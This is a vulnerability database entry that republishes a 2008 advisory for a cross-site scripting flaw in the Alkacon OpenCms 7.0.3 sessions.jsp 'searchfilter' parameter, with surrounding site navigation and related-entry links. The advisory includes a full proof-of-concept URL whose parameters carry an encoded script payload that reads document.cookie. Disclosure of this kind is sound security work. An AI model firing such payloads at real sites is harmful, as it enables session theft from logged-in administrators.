Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19575
HistoryApr 05, 2008 - 12:00 a.m.

Alkacon OpenCms sessions.jsp searchfilter XSS

2008-04-0500:00:00
vulners.com
19
JSON

Alkacon OpenCms sessions.jsp searchfilter XSS

Product: Alkacon OpenCms
http://www.opencms.org/

OpenCms contains a cross-site scripting vulnerability in the active session reporting function. Input to parameter
searchfilter in page opencms/system/workplace/admin/workplace/sessions.jsp is not sufficiently validated and/or sanitized
before it gets embedded in the resulting web page.

Example:
http://(target)/opencms/system/workplace/admin/workplace/sessions.jsp?
ispopup=&action=listsearch&framename=&title=
&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace
&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=
&formname=ls-form&sortcol=&originalparams=&page=&style=new&root=
&path=%252Fworkplace%252Fbroadcast&redirect=
&searchfilter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
&listSearchFilter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

The vulnerability has been identified in version 7.0.3. However, other versions may be also affected. Despite
similarities this is a different vulnerability than CVE-2008-1510.

Solution:
Users should not browse untrusted sites while logged into OpenCms.

Found by:
nnposter

Related

packetstorm 1
cve 2
prion 2
packetstorm
packetstorm
alkaconsessions-xss.txt
2008-04-08 00:00:00
cve
cve
CVE-2008-1510
2008-03-25 23:44:00
CVE-2008-1753
2008-04-11 21:05:00
prion
prion
Cross site scripting
2008-03-25 23:44:00
Cross site scripting
2008-04-11 21:05:00
JSON
Related for SECURITYVULNS:DOC:19575
packetstorm1cve2prion2